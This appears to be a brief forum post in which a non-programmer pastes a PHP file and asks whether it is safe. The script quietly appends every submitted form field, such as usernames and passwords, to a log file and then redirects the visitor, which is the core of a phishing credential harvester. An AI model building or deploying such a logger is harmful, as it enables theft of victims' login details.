uhh im not sure is this safe ?? open the php file in notepad ull find this:
<?php
header ('Location:

');
$handle = fopen("logs_60490.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "===============\r\n");
fclose($handle);
exit;
?>
I dont know what it does im not a scripter